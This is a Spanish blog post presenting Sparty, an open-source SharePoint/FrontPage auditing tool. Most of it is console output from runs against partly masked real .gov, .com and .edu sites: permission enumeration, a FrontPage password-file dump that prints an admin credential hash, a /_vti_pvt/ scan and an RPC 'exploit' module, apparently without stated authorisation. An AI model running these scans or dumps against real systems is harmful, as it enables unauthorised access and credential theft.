Sparty – MS Sharepoint and Frontpage Auditing Tool

En la pasada BlackHat USA Arsenal se presetó una herrramienta para hacer auditoría a Sharepoint y Frontpage.

El autor define la herramienta como:

Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

Yo la he usado, y me ha dado bastantes buenos resultados.

Checking de permisos

Una de las cosas que podemos hacer con la herramienta es hacer check de los permisos, vamos a ver un ejemplo.


[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -s layouts -u https://www.XXXXXXXXXX.gov
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (https://www.XXXXXXXXXX.gov/SitePages/Home.aspx)
[+] target responded with HTTP code: (200)
[+] target is running server: (Microsoft-IIS/7.5)

[+]-----------------------------------------------------------------!
[+] auditing sharepoint '/_layouts/' directory for access permissions !
[+]-------------------------------------------------------------------!

[-] (https://www.XXXXXXXXXX.gov/_layouts/aclinv.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/addrole.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/AdminRecycleBin.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/AreaNavigationSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/AreaTemplateSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/AreaWelcomePage.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/associatedgroups.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/bpcf.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/ChangeSiteMasterPage.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/create.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/editgrp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/editprms.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/groups.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/help.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/images/) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/listedit.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/ManageFeatures.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/ManageFeatures.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mcontent.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngctype.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngfield.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsiteadmin.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsubwebs.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsubwebs.aspx?view=sites) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/mobile/mbllists.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyInfo.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyPage.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyTasks.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/navoptions.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/NewDwp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/newgrp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/newsbweb.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/PageSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/people.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/people.aspx?MembershipGroupId=0) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/permsetup.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/picker.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/policy.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/policyconfig.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/policycts.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/Policylist.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/prjsetng.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/quiklnch.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/recyclebin.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_Layouts/RedirectPage.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/role.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/settings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/SiteDirectorySettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/sitemanager.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/SiteManager.aspx?lro=all) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/spcf.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/storman.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/themeweb.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/topnav.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/user.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/userdisp.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/userdisp.aspx?ID=1) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/useredit.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/useredit.aspx?ID=1) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/viewgrouppermissions.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/viewlsts.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/vsubwebs.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/WPPrevw.aspx?ID=247) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/wrkmng.aspx) - (403)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (layout file access) - module executed successfully !

En el caso de FrontPage, podemos dumpear credenciales 😀


[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -d dump -u http://www.XXXXX.com
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://www.XXXXX.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k DAV/2 PHP/5.3.2 with Suhosin-Patch)

[+]------------------------------------------------------------------------------------------------!
[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!
[+]--------------------------------------------------------------------------------------------------!

[+] dumping contents of file located at : (http://www.XXXXX.com/_vti_pvt/service.pwd)

[*] ---------------------------------------------------------------------------------------
[-] could not dump the file located at : (http://http://www.XXXXX.com/_vti_pvt/administrators.pwd) | (404)
[-] could not dump the file located at : (http://www.XXXXX.com/_vti_pvt/authors.pwd) | (404)
[+] check the (__dump__.txt) file if generated !


[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (password dumping) - module executed successfully !

[email protected]:~/sparty_v_0.1# cat __dump__.txt
# -FrontPage-
admin:5MDuTmvQx/6Fk

Podemos escanear permisos de FrontPage:

</pre>
[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -f pvt -u http://www.XXXXXX.com
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://www.XXXXXX.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k DAV/2 PHP/5.3.2 with Suhosin-Patch)

[+]---------------------------------------------------------!
[+] auditing '/_vti_pvt/' directory for sensitive information !
[+]-----------------------------------------------------------!

[-] (http://www.XXXXXX.com/_vti_pvt/authors.pwd) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/administrators.pwd) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/users.pwd) - (404)
[+] http://www.XXXXXX.com/_vti_pvt/service.pwd) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/service.grp) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/bots.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/service.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/access.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/writeto.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/botsinf.cnf) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/doctodep.btr) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/deptodoc.btr) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/linkinfo.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/services.org) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/structure.cnf) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/svcacl.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/uniqperm.cnf) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/service/lck) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/frontpg.lck) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (pvt file access) - module executed successfully !
<pre>

Otra de las cosas que podemos probar son Exploits.

</pre>
[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -e rpc_service_listing -u http://XXXXXX.edu
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://XXXXXX.edu)
[+] target responded with HTTP code: (200)
[+] target is running server: (HP-UX_Apache-based_Web_Server/2.0.48 (Unix) PHP/4.2.3 DAV/2 mod_ssl/2.0.48 OpenSSL/0.9.7c FrontPage/5.0.2.2635)

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service for fetching listing !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP POST request to retrieve service listing - (http://XXXXXX.edu/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html)

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html)

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP POST request to retrieve service listing - (http://XXXXXX.edu/_vti_bin/shtml.dll/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html)

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html)

[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (module RPC service listing check) - module executed successfully !
<pre>

LA página con la herramienta está aquí => http://sparty.secniche.org/


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: Seifreed

Formado en un equipo de lucha contra el fraude. He trabajado implementando la protección y prevención del fraude en varios clientes dentro del sector bancario nacional e internacioal. Mi trabajo consiste en encontrar soluciones a los problemas actuales y futuros de las entidades financieras respecto al código malicioso y el fraude. Especialidades como el análisis de malware, análisis forense, ingeniería inversa o tareas de hacking ético, forman parte de mis tareas diarias. Soy ponente ien eventos nacionales (No cON Name, Owasp, Navaja Negra) e internacionales (DraonJAR CON - Colombia). Soy profesor asociado en La Salle enseñando el curso MPWAR (Master in High Performance Web Programming) y el máster de ciberseguridad de La Salle (MCS. Master in Cybersecurity) Miembro de asociaciones y grupos de research como la HoneyNet Project, Owasp, SySsec etc.. También soy el organizador de las conferencias Hack&Beers en Barcelona

Compartir este Artículo
  • Muy buena información, solo tengo un problema al descargar la tool y descomprimirla me dice que el archivo esta dañado lo eh intentado en ubuntu y windows

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES